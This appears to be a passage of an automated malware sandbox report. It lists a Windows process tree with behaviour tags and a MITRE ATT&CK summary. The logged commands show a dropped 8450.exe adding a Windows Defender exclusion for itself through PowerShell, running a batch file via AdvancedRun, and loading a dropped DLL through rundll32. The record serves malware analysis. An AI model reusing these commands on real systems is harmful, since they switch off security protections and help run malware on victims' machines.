C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵PID:7108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:7792
-
C:\Users\Admin\AppData\Local\Temp\8450.exeC:\Users\Admin\AppData\Local\Temp\8450.exe1⤵
- Windows security modification
- Suspicious use of SetThreadContext
PID:7092 -
C:\Users\Admin\AppData\Local\Temp\0788e2b1-32d4-4014-9e5a-7ede4e27ab16\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\0788e2b1-32d4-4014-9e5a-7ede4e27ab16\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0788e2b1-32d4-4014-9e5a-7ede4e27ab16\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵PID:6188
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0788e2b1-32d4-4014-9e5a-7ede4e27ab16\test.bat"3⤵PID:3240
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\8450.exe" -Force2⤵PID:7784
-
-
C:\Users\Admin\AppData\Local\Temp\8450.exeC:\Users\Admin\AppData\Local\Temp\8450.exe2⤵PID:7764
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7684 -s 8802⤵
- Loads dropped DLL
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1848
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7852
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7684 -ip 76841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6376
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:4900
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8056
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4512
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5800
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7444
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious use of SendNotifyMessage
PID:7448
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:8064 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5188
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:6308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7628 -ip 76281⤵PID:6972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4348 -ip 43481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4080
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7972 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3580
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 7472 -ip 74721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4504
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Suspicious use of SendNotifyMessage
PID:3680
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
4Install Root Certificate
1Modify Registry
6Virtualization/Sandbox Evasion
1Web Service
1